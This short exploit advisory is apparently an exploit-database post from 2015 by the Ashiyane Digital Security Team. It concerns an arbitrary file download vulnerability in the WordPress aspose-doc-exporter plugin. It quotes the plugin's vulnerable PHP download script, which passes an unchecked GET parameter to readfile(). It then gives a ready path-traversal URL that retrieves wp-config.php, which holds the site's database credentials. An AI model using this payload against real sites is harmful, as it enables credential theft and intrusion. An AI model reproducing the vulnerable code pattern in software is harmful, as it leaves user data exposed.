WordPress Aspose Doc Exporter File Download
Posted on 31 March 2015
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||*
